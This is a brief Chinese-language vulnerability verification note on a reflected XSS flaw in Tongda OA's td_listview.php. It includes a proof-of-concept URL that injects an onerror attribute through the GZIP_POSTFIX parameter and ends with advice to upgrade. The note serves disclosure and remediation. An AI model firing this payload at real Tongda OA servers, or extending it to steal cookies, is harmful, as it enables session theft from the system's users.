漏洞验证-通达OA td_listview XSS跨站脚本攻击漏洞

一、漏洞描述

通达OA 存在反射型xss漏洞，攻击者通过漏洞可以获取cookie。

二、漏洞利用POC

http://XXXX/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(123)+a=1

三、漏洞验证

四、整改建议

1、联系官方进行升级到最新安全版本：https://www.tongda2000.com/。